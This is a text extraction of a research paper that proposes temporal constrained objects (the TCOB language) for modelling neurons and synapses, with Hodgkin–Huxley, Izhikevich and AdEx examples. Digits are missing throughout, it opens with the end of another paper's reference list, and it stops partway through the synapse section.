. modeling and learning multilingual inflectional morphology in a minimally supervised framework. ph.d. thesis, johns hopkins university. yadollah yaghoobzadeh and hinrich schütze. . corpus-level fine-grained entity typing using contex- tual information. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – , lisbon, portugal, september. association for computational linguistics. david yarowsky and richard wicentowski. . min- imally supervised morphological analysis by multi- modal alignment. in the th annual meeting of the association for computational linguistics. wenpeng yin and hinrich schütze. . convolutional neural network for paraphrase identification. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , denver, colorado, may–june. association for computational linguistics. britta d. zeller, jan šnajder, and sebastian padó. . derivbase: inducing and evaluating a derivational morphology resource for german. in proceedings of the st annual meeting of the association for com- putational linguistics (volume : long papers), pages – , sofia, bulgaria, august. association for computational linguistics. britta d. zeller, sebastian padó, and jan šnajder. . towards semantic validation of a derivational lexicon. in proceedings the th international conference on computational linguistics, pages – , dublin, ireland, august. dublin city university and associa- tion for computational linguistics. temporal constrained objects for modelling neuronal dynamics temporal constrained objects for modelling neuronal dynamics manjusha nair , , jinesh manchan kannimoola , bharat jayaraman , bipin nair and shyam diwakar amrita school of biotechnology, amrita vishwa vidyapeetham, kollam, kerala, india department of computer science and applications, amritapuri campus, amrita vishwa vidyapeetham, kollam, kerala, india center for cybersecurity systems and networks, amritapuri campus, amrita vishwa vidyapeetham, kollam, kerala, india department of computer science & engineering, state university of new york at buffalo, buffalo, ny, usa abstract background: several new programming languages and technologies have emerged in the past few decades in order to ease the task of modelling complex systems. modelling the dynamics of complex systems requires various levels of abstractions and reductive measures in representing the underlying behaviour. this also often requires making a trade-off between how realistic a model should be in order to address the scientific questions of interest and the computational tractability of the model. methods: in this paper, we propose a novel programming paradigm, called temporal constrained objects, which facilitates a principled approach to modelling complex dynamical systems. temporal constrained objects are an extension of constrained objects with a focus on the analysis and prediction of the dynamic behaviour of a system. the structural aspects of a neuronal system are represented using objects, as in object-oriented languages, while the dynamic behaviour of neurons and synapses are modelled using declarative temporal constraints. computation in this paradigm is a process of constraint satisfaction within a time-based simulation. results: we identified the feasibility and practicality in automatically mapping different kinds of neuron and synapse models to the constraints of temporal constrained objects. simple neuronal networks were modelled by composing circuit components, implicitly satisfying the internal constraints of each component and interface constraints of the composition. simulations show that temporal constrained objects provide significant conciseness in the formulation of these models. the underlying computational engine employed here automatically finds the solutions to the problems stated, reducing the code for modelling and simulation control. all examples reported in this paper have been programmed and successfully tested using the prototype language called tcob. the code along with the programming environment are available at http://github.com/compneuro/ tcob_neuron. discussion: temporal constrained objects provide powerful capabilities for modelling the structural and dynamic aspects of neural systems. capabilities of the constraint programming paradigm, such as declarative specification, the ability to express partial information and non-directionality, and capabilities of the object-oriented paradigm especially aggregation and inheritance, make this paradigm the right candidate for complex systems and computational modelling studies. with the advent of multi-core how to cite this article nair et al. ( ), temporal constrained objects for modelling neuronal dynamics. peerj comput. sci. :e ; doi . /peerj-cs. submitted march accepted june published july corresponding author shyam diwakar, shyam@amrita.edu academic editor nicolas rougier additional information and declarations can be found on page doi . /peerj-cs. copyright nair et al. distributed under creative commons cc-by . http://github.com/compneuro/tcob_neuron http://github.com/compneuro/tcob_neuron http://dx.doi.org/ . /peerj-cs. mailto:shyam@�amrita.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ parallel computer architectures and techniques or parallel constraint-solving, the paradigm of temporal constrained objects lends itself to highly efficient execution which is necessary for modelling and simulation of large brain circuits. subjects computational biology, scientific computing and simulation, programming languages keywords temporal constrained objects, constraint programming, object-oriented languages, declarative modelling, neuron models introduction modelling complex systems using computer languages has spanned a wide range of domains: from organs and organ systems to weather and atmospheric turbulence to economic systems and social networks. while it is the responsibility of the programmer to choose an appropriate paradigm for the problem at hand, conventional languages are limited in their ability to provide the right framework for a broad range of problems. models for complex problems tend to be large and unwieldy, and hence it is critically important that the programming language used to program such models not exacerbate the problem with inadequate support. in this regard, imperative languages require more effort on the programmer, in providing the detailed data representation and algorithms, needed to solve a problem. this adds another layer of software complexity, especially when the problem to be modelled is a highly complex one. declarative languages had their origins in s and are useful in directly modelling a problem by stating the properties of solutions (benhamou, jussien & o’sullivan, ). in constraint-based languages, programmers declaratively specify the relation between variables using constraints, and the task of solving/maintaining the constraints is the responsibility of the underlying constraint solvers (freeman-benson, maloney & borning, ). this approach provides the desired separation between the problem- specification phase and the problem-solving phase. in this paper, we present a compositional approach in constraint programming to model the structure and behaviour of complex biological systems using the concept of temporal constrained objects (kannimoola et al., ). temporal constrained objects are an extension of the paradigm of constrained objects which has been studied for over three decades (borning, ; leler, ; horn, ; tambay, ) and provide a declarative approach to data abstraction using the concepts of classes, hierarchies and aggregation found in object-oriented languages (lago & artalejo, ; reiner & zimmer, ). constrained objects also provide a declarative approach to behavioural specification using constraints within the class (jayaraman & tambay, ). constrained objects have been used previously to model cellular behaviour (covert, famili & palsson, ) and metabolic pathways in cells (pushpendran, ) in the context of biological systems. although constraint satisfaction problems were introduced originally as a static framework, the paradigm of temporal constrained objects allows a modeller to solve a broader class of problems. in temporal constrained objects, constraint-solving is integrated within a time-based simulation regime and is nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ well-suited to problem domains that require ordinary differential equations or partial differential equations. extensions to constraint programming frameworks, such as hybrid concurrent constraint programming (gupta et al., ), have also proved to be useful in modelling constraint satisfaction problems with time-varying behaviours. temporal constrained objects were successful in modelling highly dynamic systems such as vehicular networks (kannimoola, jayaraman & achuthan, ) and firewalls (kannimoola, jayaraman & achuthan, ). this paper applies similar modelling principles to neural microcircuits. in this paper, we demonstrate how the paradigm of temporal constrained objects can be applied for modelling the structure and behaviour of a complex biological system. temporal constrained objects are appropriate for systems whose behaviour is governed by physical laws. the adaptive and dynamic nature of neural circuits demands efficient modelling strategies to incorporate structural compositions of the constituents at various translational levels—from ion channels to neurons to networks and behavioural systems. this paradigm is suitable to model neural systems since it focuses on a component- based modelling approach, with individual components governed by invariant principles. for example, neurons’ and synapses’ signalling mechanisms and its non-linear dynamics are represented by membrane voltage models constrained by current and voltage laws, and are also known to be constrained by neuronal anatomy and interconnection between neurons (gutkin, pinto & ermentrout, ). while building neural networks, the aggregation of different neuronal circuit elements was automatically addressed using internal and interface constraints, without imposing the relations explicitly from outside. in this paper, the section ‘background’ gives background about the programming language aspects of temporal constrained objects followed by the essential modelling principles of neural systems. computational modelling of neural systems using temporal constrained objects is described in the section ‘methods.’ we present a detailed case study of an implementation of neurons and the micro-circuitry of a rat cerebellum granular layer. the ‘results’ section includes the results of modelling with temporal constrained objects as well as model validations and performance optimizations. the last two sections of the paper highlights the discussion followed by conclusions and remarks on future research directions. background programming methodology popular mainstream programming languages such as c, java or python require the programmer to specify detailed procedural instructions on how to solve a problem. in these languages, model specification and model implementation details are interwoven. in contrast, a declarative program specifies the expected result of a computation without explicitly detailing with the steps that must be performed to obtain that result. that is, declarative programming focuses more on what is to be computed, rather than how (lloyd, ). in this paper we introduce a declarative programming paradigm called temporal constrained objects which integrates declarative constraints and constraint solving within the popular object-oriented paradigm for data abstraction. nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a constraint is a declarative specification of a relation between variables and does not explicitly specify a procedure or algorithm to enforce the relation. in constraint programming, the programmer models the system as a set of variables over well-defined domains and states the problem as a set of constraints on these variables. the constraint solver enumerates the possible values of the variables and checks whether these enumeration leads to a solution or not, by a process called constraint satisfaction. constraints have been used in the past for formulating many combinatorial problems, including search problems in artificial intelligence and operational research. object-oriented methods support component-based modelling where the whole system can be modelled incrementally using subsystems modelled previously. although most mainstream languages that support object-oriented principles follow the imperative style of programming, object-oriented languages supporting declarative semantics have also been proposed (lago & artalejo, ). in temporal constrained objects the state of an object, i.e., the values of its attributes, is determined by a set of declarative constraints rather than by imperative procedures. constraint-based and related systems among the first in the area of constrained objects was thinglab (borning, ), a constraint-based simulation laboratory designed for interactive graphical simulations. the kaleidoscope ’ language (lopez, freeman-benson & borning, ; govindarajan, jayaraman & mantha, ) integrated constraints and object-oriented programming for interactive graphical user interfaces. kaleidoscope added constraint hierarchies, multi-methods and constraint constructors, as well as user-defined constraints, which were simplified by the compiler to primitive constraints that could be solved by a primitive solver. bertrand (leler, ) was another language aimed at graphics applications, which was extended by bruce horn in his constrained object language siri (horn, ). this language used the notion of event pattern to declaratively specify state changes: by declaring what constraints held after the execution of a method, and also specifying which attributes may and may not change during the method execution. this constraint imperative language uses constraints to simulate imperative constructs such as updating, assignment and object identity. inspired by kaleidoscope, the language babelsberg (felgentreff et al., ) was developed that integrates constraints with object-oriented systems. a ruby extension has been developed wherein programmers could add constraints to existing ruby programs in incremental steps. another extension has been made accessible from the smalltalk language to enable the dynamic management of constraints, and a similar approach was followed by integrating constraint programming into java language environment (hon & chun, ). being early approaches, they provide a limited capability for expressing constraints. modelica (fritzson, ) is a constrained object language for modelling and simulation in the engineering context. it supports numerical constraints in an object-oriented framework and uses the matlab engine for constraint solving. temporal constrained objects presented in this paper also employs similar modelling principles. nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ existing neuroscience modelling platforms and tools modelling and simulation techniques are extensively used as powerful complements to hypothesis testing for experimental studies related to biological and physiological systems. simulation engines, computing environments and languages help building the computational model of the system from mathematical models. currently, a neuroscience modeller has wide choice of tools that support better integration and model reuse across multiple simulators. while simulators such as neuron, genesis and nest employ domain-specific custom scripting languages to isolate model specification from simulation code, interoperable scripting was supported in simulators like moose and pynn (goddard & hood, ; hines & carnevale, ; diesmann & gewaltig, ; ray & bhalla, ; davison et al., ). neuron uses the interpreted language hoc for simulation control and a high-level language neuron model description language (nmodl) for describing models, where each line of nmodl is translated into equivalent c statements. both genesis and nestuse high-level simulation languages to model neurons and synapses. while the simulation kernel of nest is written in c++, python commands are used to formulate and run neuron simulations with an extended code generation support using cython (zaytsev & morrison, ). genesis also supports declarative modelling using a script-based language interpreter. these specialized tools are less verbose and can address different domain-specific modelling tasks in a computationally tractable way. all these simulators are software packages with several thousands of lines of code (loc) and pose model exchange and interoperability problems. although conceptual structure of modelling is commonly addressed in these simulators in a precise and concise manner, the simulation kernel of these tools uses object oriented and low level procedural code libraries. since conversion of models from one simulator to another is a non-trivial task, simulator-independent language initiatives facilitated model sharing and model reuse across multiple simulators. pynn and moose uses high level python libraries and apis to support simulator independent interface for neuron modelling. apart from these attempts, xml based model specification languages have helped reduce the implementation and platform dependent biases in the modelling process. as a model representation language, systems biology markup language provides a common format for describing models and supports interoperability among different tools in computational biology (hucka et al., ). neuroml (gleeson et al., ) uses distinctive xml schemas to represent the morphology (morphml), channel conductance (channelml) and network properties (networkml) of neural systems. nineml (raikov, ) uses xml based abstract object models and enable quick prototyping of neuron, synapse and network models using parameters for model variables, state update rules and mathematical descriptions. low entropy model specification also follows a similar approach and are more flexible in defining and translating models (cannon et al., ). even though the xml-based model description frameworks reduce external software dependencies, they do not provide any details on how to simulate the models. xml schemas supports model exchange and automated validation of nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ components but for better integration with existing simulators, these models should be easily translatable to multiple simulation platforms. the simulators need to either translate the models into equivalent internal models or use code generation through external or built in libraries. spiking neural mark-up language (spineml), an extension of nineml uses simulator specific extensible stylesheet language transformations (xslt) templates to generate the simulation code (richmond et al., ). the encoding of model details from xml format to the internal representation of the simulator completely depends on the data structure of the language selected for this translation. for example, mapping the neuroml model description to the internal data structure of the simulators such as neuron, genesis, pynn or moose is provided through simulator specific native scripts. although the aforementioned simulators hide the implementation complexity from the modeller either through gui or through modules and scripting, the software complexity of the simulator increases while satisfying these requirements. the computational architecture of the simulators handled the complexity and provided interfaces to the end user. since temporal constrained objects are founded on constraints, a model’s concept space (model specification) and computational space (simulation control) can be represented with less implementation complexity. for modelling multiple levels as in enzyme or biochemical kinematics to neurons and neural circuits, a constraint-based solver that could handle several models of differential equation style mathematical abstractions was attempted in this study. another motivation for our choice of the paradigm of temporal constrained objects is its amenability to parallelization. modern programming paradigms are biased more towards many-core and multi-core programming. current day simulation systems have become more reliant on high performance computing techniques. in computational neuroscience, a modelling study generally involves learning a domain specific language and then depending on the framework of this language to parallelize the programs. neuron and genesis require modifications in the coding strategy to port the model to cluster computing environment while nest almost transparently maps a model to multicore computers. brian has little support for parallelization which limits its use for large scale systems (goodman & brette, ). the transition of a software to parallelization is easier with declarative paradigms (darlington, reeve & wright, ). the advantage with parallel constraint programming is that no change is needed in the problem model for parallelization and the constraint framework handle the parallelization primitives. parallel constraint programming frameworks exist (rolf, ) which automatically parallelize the problem by dividing the task among several constraint solvers which perform parallel consistency and parallel search processes. since consistency checking during constraint solving has similarities to single instruction multiple thread parallelism, gpu level parallelization of constraint propagation has been explored recently (campeotto et al., ). although beyond the limits of this paper, integrating parallelization with temporal constrained objects frameworks will benefit the neuroscience community to easily create abstract models which are automatically scalable. nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ temporal constrained objects constrained objects support object-oriented features, such as aggregation and inheritance, along with constraint-based specifications such as arithmetic equations and inequalities, quantified and conditional constraints. the programming language cob implements the constrained object paradigm (jayaraman & tambay, ). the cob language defines a set of classes, each of which contains a set of attributes, constraints, predicates and constructors. every constrained object is an instance of some class whose outline is as follows. class_definition ::= [ abstract] class class id [ extends class id ] {body} body :: = [ attributes attributes] [ constraints constraints] [ predicates predicates ] [ constructors constructors] a class may optionally extend another class and the attributes, constraints, predicates and constructors are all optional. constraints specify the relation between attributes of the typed classes. constrained objects support both primitive and user-defined attributes, and constraints may be simple, conditional, quantified, or aggregate (also see supplementary material for a complete specification of the grammar of the language) (tambay, ). temporal constrained objects extend the basic paradigm of constrained objects to support time-varying properties of dynamic systems. using temporal constrained objects, the structural aspects and the modularity of a system are modelled using encapsulation, inheritance and aggregation while the behavioural aspects are modelled through a rich set of constraints. the underlying computational engine performs logical inference and constraint satisfaction to enforce the behaviour automatically while each object is created. one of the most useful features of temporal constrained objects for modelling temporal (or dynamic) behaviour is the series variable, declared as: series type variable_name [initialization]; the series variable takes on an unbounded sequence of values over time, and temporal constraints are defined in terms of past and future values of the series variable. for every series variable v, the expression�v refers to the immediate previous value of v and v� to the next value. these operators can be juxtaposed (for example,��v and v��) to refer to successive values of v in the past or future. a series variable may also be initialized by explicitly assigning values at specific time points. an example of an alternating-current (ac) circuit illustrates the basic constructs of the language (fig. ). the series attributes, voltage (v) and current (i), in the abstract component class holds the sequence of values at different instance of time. the source class generates the input voltage for the circuit, which varies sinusoidal with time. the classes resistor and capacitor inherit voltage and current from the component class. the constraints in each class define the laws of circuit elements: the resistor class nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ abstract class component{ attributes series real v, i; constraints v< > = . ; i< > = . } class source extends component{ constraints sin(time, v); constructors source(){} } class resistor extends component{ attributes real r; constraints v = i * r; constructors resistor(r ) { r = r ; } } class capacitor extends component{ attributes real c; constraints i = c * (v -‘v); constructors capacitor(c ) { c = c ; } } class series_comp extends component{ attributes component [] sc; constraint forall c in sc: c.i = i; (sum x in sc: x.v) = v; constructors series_comp(a) { sc = a; } } class parallel_comp extends component{ attributes component[] pc; constraints forall x in pc: x.v = v; (sum x in pc: x.i) = i; constructors parallel_comp(b) {pc = b;} } class sample_circuit { attributes source ac;resistor r ,r ; capacitor c; series_comp s; parallel_comp p; component[]ser; component[]par; constructors sample_circuit(){ r = new resistor( . ); r = new resistor( . ); c = new capacitor( . ); ser[ ] = r ;ser[ ] = c; s = new series_comp(ser); ac = new source(); par[ ]=s; par[ ]=ac; par[ ]=r ; p = new parallel_comp(par); }} figure temporal constrained object representation of ac circuit. full-size doi: . /peerj-cs. /fig- incorporates ohm’s law for resistance (eq. ( )); and the capacitor class incorporates ampere’s law for capacitance (eq. ( )). v ¼ ir ( ) i ¼ c dv dt ( ) the differential equation (eq. ( )) is treated as difference equations in the capacitor class, i.e. the rate of change of voltage can be approximated by change in voltage in one unit of time. the parallel_comp and series_comp classes represent the two different nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ways of combining the components of the ac circuit. (of course, non-series parallel circuits can also be defined, but the example in fig. pertains only to series-parallel circuits.) the constraints describe the resultant voltage and current for both kinds of circuits. for example, in class parallel_comp, the quantified constraint forall enforces that the voltage across every component in the parallel circuit is the same and equal to the voltage across the parallel circuit; and, the summation constraint sums up the currents through each component of the parallel circuit and equates it to the current through the parallel circuit. the class sample_circuit builds a series component with a resistor and capacitor and a parallel component consisting of the series component, a sinusoidal voltage source and a single resistor. in order to understand the execution of a tcob program, tcob provides a built-in variable time, which represents the current time and is automatically incremented by one unit to record the progression of time. the default initial value for time is equal to one unless a different value is specified by the user. the user may adopt any other discrete granularity for time by multiplying with a suitable scaling factor, e.g. mytime = . � time. we use the example of an on-off controller (fig. ) to illustrate the basic concepts of conditional constraints in the tcob. this is a simplified version of traffic light example from a previous paper (kannimoola, jayaraman & achuthan ( )). the variable c is declared using series keyword to model transitioning from on/off state in each time instance, specified by the conditional constraint symbol -->. when time = , the value of c = on since this is the initial value of c as given in the constructor. at this time, the value of c�, i.e. value of c at time = is set as off based on the first constraint in the program. in a similar manner, the second constraint determines values for c for off-on transition. in this implementation, the tcob programming environment consists of a compiler which translates the class definitions into equivalent predicates in swi- prolog which provides support for constraint-solving through its libraries. a more detailed description of the language is given in reference (kannimoola et al., ). electrical equivalent circuit of neurons a single neuron is often conceptualised using the biophysics of a neuronal membrane, represented by resistance-capacitance (rc) low-pass filtering properties wherein the class controller { attributes series string c; constraints c = on --> c` = off; c = off --> c` = on; constructor controller(){ c< > = on;} } figure simple controller using conditional constraints. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lipid bi-layer of the neurons is modelled as capacitance (c), the voltage-gated ion channels as electrical conductance (g) and the electrical gradient as reversal potentials. then, basic voltage and current laws (ohm’s and kirchhoff’s laws) are employed to calculate the voltage across the membrane of the neuron. the cell membrane acts as a diffusion barrier and an insulator to the movement of ions. the lipid bi-layer of the membrane accumulates charges over its surface where the intracellular and extracellular solutions act as the conducting plates separated by the non-conducting membrane. the capacitive current ic , thus formed is ic ¼ c dv dt ( ) where c is the capacitance and v is voltage across the membrane. ions flow into and out of the cell through ion channels. the flow of ions through these channels leads to resistive current flow into the neuron, which is represented using ohm’s law: iion ¼ vgion ( ) where gion is the conductance of ion across the membrane and iion is the ionic current. the electromotive force acting over the ions as the battery of the circuit, when included, the ionic current can be represented as, iion ¼ gionðv � eionÞ ( ) total current flowing across the membrane is the sum of the capacitive and ionic currents: itotal ¼ ic þ iion ( ) at steady state, membrane voltage remains constant, which means that the net current into the neuron plus the net current out of the neuron must equal zero. itotal ¼ ic þ iion ¼ ( ) when an input current iext is injected into the cell, it further charges the capacitor and the current leaks through the membrane. iext ¼ c dv dt þ iion ( ) larger number of open ion channels in the membrane decreases the resistance of the membrane due to increased ionic flow across the membrane. this results in an increase in conductance across the membrane. ionic current flow through a neuron with sodium, potassium and leak channels can thus be modelled as, iext ¼ c dv dt þ gnaðv � enaÞ þ gk ðv � ekÞ þ glðv � elÞ ( ) passive electrical properties persist in the neuron if the current is a sub threshold current or a hyperpolarizing current. neurons are known to communicate to each other using stereotyped electrical signals called action potentials or spikes. the generation of action potential in the neuron can be explained by modelling the activation of ion channels. nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ detailed conductance-based models like hodgkin–huxley (hh) model and simpler phenomenological models like izhikevich model and adaptive exponential integrate and fire model were used in this study to explain the spiking mechanisms of neurons. methods in this paper, we used temporal constrained objects to model the time-varying dynamics of a neural circuit as exhibited by the electrical activity of neurons and synapses. in modelling studies, elemental features of a neural system are abstracted into a conceptual model and are formalized into a mathematical form. a working embodiment of neural dynamics is created using computational models which is used to test and examine the modelled abstract. chemical and electrical phenomena of neural systems were then simulated from mathematical representations (fig. ). temporal constrained objects allowed a direct implementation of the circuit model of a neuronal system. initial focus was on modelling the component-based structure of the neural system by identifying the components, their functions and parameters. the main constituent of the neural system—the neuron—was modelled in two different formulations: ( ) using voltage functions which are continuous over a time evolution (as in a hh model, described in ‘modelling neurons using continuous time hh mechanisms’); and ( ) using voltage reset functions which show piece wise state changes (as in adex and izhikevich models, described in ‘reconstructing neurons using voltage vin vout ic ina ik il gna gk glc ena ek el stim iext dt dv cvvgvvgvvgi llkknanaext )()()( neuron c,vm,iext gna,gk,gl,vna,vk,vl ina =m*m*m*h*gna*(vm-ena); ik = n*n*n*n* gk * (vm-ek); ileak= gl* (vm)-el; iion= ina + ik+ il; vm = `vm+ ( ( iext -`iion ) / c); neuron rc circuit equivalent model mathematical model computational model figure computational modelling of neurons. it is a common practice to abstract a neuron as an rc circuit to describe the electrical properties of the neuron. current flow in the neuron was mathematically modelled using this equivalent model. in the temporal constrained object approach, a neuron was represented as an abstract data type with attributes (state information) and constraints (rules of behaviour). full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reset models’). ‘modelling synaptic dynamics’ presents modelling the synaptic interactions between neurons using continuous functions of time. in modelling neurons and synapses with temporal constrained objects, the biophysical mechanisms (abstracted as mathematical formulations in the models) were represented as constraints of the class. continuous state changes of variables were represented using simple constraints while voltage reset functions were represented using conditional constraints. once the fundamental components of a neural network were modelled, the interaction between these components in a network (‘modelling neuronal interactions’ and ‘modelling cerebellar microcircuits’) was incorporated. biological fidelity of the models was tested to validate whether the model produces experimental outcomes. modelling neurons using continuous time hodgkin–huxley mechanisms hodgkin–huxley equations (hodgkin & huxley, ) model biophysical characteristics of a neuronal membrane in detail. this model exhibits various neuronal behaviour by the calculation of ionic current in their mathematical notation. a set of first-order differential equations specify the dynamics of membrane voltages and ion channels of the neurons. according to this model, the ionic current flow in eq. ( ) has been rephrased as, iext ¼ c dv dt þ gnamaxm hðv � enaÞ þ gkmaxn ðv � ekÞ þ glðv � elÞ ( a) where the ionic conductance was modelled as voltage dependent quantity with the flow of ions regulated by physical gates which are either in their open state or in closed state. in ( a), gnamax and gkmax are the maximum conductance of na + and k + ions, m and h are the probabilities of the fast and slow subunits of na channel being open and closed states and n is the probability of the subunit of a k channel being open. dynamical properties of these gating variables are also represented using differential eqs. ( b– d). dh dt ¼ ahð � hÞ � bhh ( b) dn dt ¼ anð � nÞ � bnn ( c) dm dt ¼ amð � mÞ � bmm; ( d) hodgkin–huxley model represents a system of four differential eqs. ( a to d) which are coupled via voltage vof the membrane. in the standard formulation of hh model, the rate constants a and b of the ionic gates are empirically determined as a function of membrane voltage v as am ¼ ð : � : vÞ e : � : v � ; bm ¼ e �v ( e) an ¼ ð : � : vÞ e � : v � ; bn ¼ : e �v ( f) nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ah ¼ : e� v ; bh ¼ e � : v þ ( g) in temporal constrained object implementation of the hh model, the properties of neurons, such as maximum channel conductance, reversal potential, or capacitance of the cell were represented as attributes of the class. dynamically changing membrane voltage, the gating variables and the input current values were represented as series variables. the mathematical equations representing the relation between these variables were represented using quantified constraints and their initial values were represented using simple constraints (fig. ). objects of the class can be created using creational constraints. the membrane potential in the hh model varies as a continuous function over time and the numerical integration require that the values should be specified over a time evolution. in traditional object-oriented languages, the behaviour of the model can be enforced using member functions in the class which are to be explicitly called during execution. in the temporal constrained object based formulation, the differential equations are converted into difference equations and the simulation evaluated the constraint at every time step. this facilitates a modular representation, where the model behaviour is implicitly enforced during constraint satisfaction. reconstructing neurons using voltage reset models detailed conductance-based models (as in ‘modelling neurons using continuous time hodgkin–huxley mechanisms’) explain the behaviour of the neurons at a mechanistic level. since such models have higher computational costs for complex circuits, we adopted two mathematical abstractions: izhikevich model and adaptive exponential integrate and fire model (izhikevich, ; brette & gerstner, ). class neuron { … constraints %the voltage equation (vm-`vm)=dt*(istim-((gna*pow(`m, )*`h*(`vm-ena))+(gk* pow(`n, )*(`vm-ek))+(gleak*(`vm-eleak))))/c; %m,n,h dynamics (m-`m)=dt*(( -`m)*(( . *(-vm + ))/(pow(e,(-vm+ )/ )- )) - * pow(e,(-vm) / )*`m); (n-`n)=dt*(( -`n)*((( . / )*(-vm+ ))/(pow(e,(-vm+ )/ )- )) - . *pow(e,(-vm)/ )*`n); (h-`h)=dt*(( -h)*(( . / )*pow(e,(-vm)/ ))-( /(pow(e,(vm+ )/ ) + ))*`h); time < -->istim = ; %applying input current time >= -->istim = ; … } figure representation of hodgkin–huxley model as a tcob class. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the izhikevich model is expressed as: dv dt ¼ : v þ v þ � u þ i ( a) du dt ¼ a bv � uð Þ ( b) if u > mv; v ¼ c; u ¼ u þ d ( c) in the two-dimensional set of ordinary differential equations of the izhikevich model (eqs. ( a)–( c)), v is the membrane potential, u is the recovery variable, a represents the time scale of this recovery variable, b represents the sensitivity of u towards sub-threshold fluctuations in v, c represents the after spike reset value of v, d represents the after spike reset value of u. this implementation of a canonical model includes a nonlinear term v , and has been shown to reproduce multiple behaviours of neurons such as spiking, busting, adaptation, resonance and mixed mode behaviours. the adaptive-exponential integrate and fire (adex) model is expressed as: dv dt ¼ gl � v � elð Þ þ gl � t � exp v�vt t � � � isyn � w c ( a) �w dw dt ¼ a � v � elð Þ � w ( b) if v > mv; v ¼ vr; w ¼ w þ b ( c) this model (eqs. ( a)–( c)) represents spiking dynamics (eq. ( a)) and the adaptation in the firing rate of the neuron (eq. ( b)) with v representing the membrane voltage, c is the membrane capacitance, gl is the leak conductance, el is the resting potential, �t is the slope factor, vt is the threshold potential, vr is the reset potential, isyn is the synaptic current, �w is the adaptation time constant, a is the level of sub-threshold adaptation and b represents spike triggered adaptation. the model implementation follows the dynamics of a rc circuit until v reaches vt. the neuron is presumed to fire on crossing this threshold voltage and the downswing of the action potential is replaced by a reset of membrane potential v to a lower value, vr. since adex and izhikevich models do not contain continuous-time equations, the membrane dynamics and its reset mechanisms in tcob models were represented using conditional constraints. for example, fig. shows the class definition for an izhikevich model. in the model, the membrane voltage does not change as a continuous function of time. the auxiliary reset of the membrane voltage v and the membrane recovery variable u, required a discontinuous change during constraint solving, the value being independent from the value of the variable in the previous time step. this change was controlled using the value of a series variable ‘flag,’ and using conditional constraints. it should be noted that this is not an imperative update of a state variable but rather the declarative specification of a value at a new point in time. since the membrane potential vm diverges towards infinity at a particular step and vm need to be reset before nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this step, another series variable varray was used to store a finite maximum upswing value for vm. adex type neurons were also modelled similarly (see supplementary material for the complete class definition). modelling synaptic dynamics the neurotransmitter release and intake mechanisms of the pre- and post-synaptic neurons were modelled using synaptic conductance gsyn(t). the changes were represented as continuous-time equations which represented the fluctuations in synaptic conductance changes attributed to current flow (destexhe, mainen & sejnowski, ). the synaptic currents were calculated as the difference between reversal potential and membrane potential (eq. ( )). isyn tð Þ ¼ gsyn tð Þ v � esyn � � ( ) where gsyn(t) = gmax . g(t), and gmax is the maximal conductance of the synapse, g(t) is the time course of synaptic channel conductance, isyn(t) is the synaptic current, esyn is the synaptic reversal potential and v is the membrane voltage. the time course of channel conductance g(t) was modelled using different mathematical formulations (roth & van rossum, ). for example, reconstructing exponential synapses biophysically included an instantaneous rise of gsyn(t) from to gmax at time t (the time at which spike occurs) followed by an exponential term specifying the decay, with a time constant � (eq. ( )). class neuron { attributes series real vm, varray, u; series int flag; real a,b,c,d; real i,dt; constraints flag= -->(vm-`vm)/dt=(( . / )*`vm*`vm+ *`vm+ -`u+i); flag= -->(u-`u)/dt=a*(b*`vm-`u); vm > --> (vm` = c) ; vm > --> (u`= u + d) ; vm > --> flag`= ; vm <= --> flag`= ; flag = --> varray=vm; flag = --> varray = . ; constructors neuron() { a = . ; b = . ; c = - . ; d = . ; vm< > = - . ; u< > = b* vm< >; flag< > = ; i = . , dt= . ; } } figure izhikevich model represented as a tcob class. full-size doi: . /peerj-cs. /fig- nair et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gsyn tð Þ ¼ gmax:e� t�t �ð Þ ( ) the exponential synapse model approximates synaptic dynamics with the rising phase shorter than the decay phase. a single-exponential function is a reliable approximation for several synapses where the channels instantaneously transit from closed to open states. alpha synaptic models have been used for synapses with finite duration rising phases (eq. ( )) while in double-exponential synapse model, both rise time and decay time of the synapses were modelled separately (eqs. ( a)–( c)). gsyn tð Þ ¼ gmax: t � t � :e � t�t ð Þ � ( ) gsyn tð Þ ¼ gmax : fnorm : e � t�t �decay � � � e� 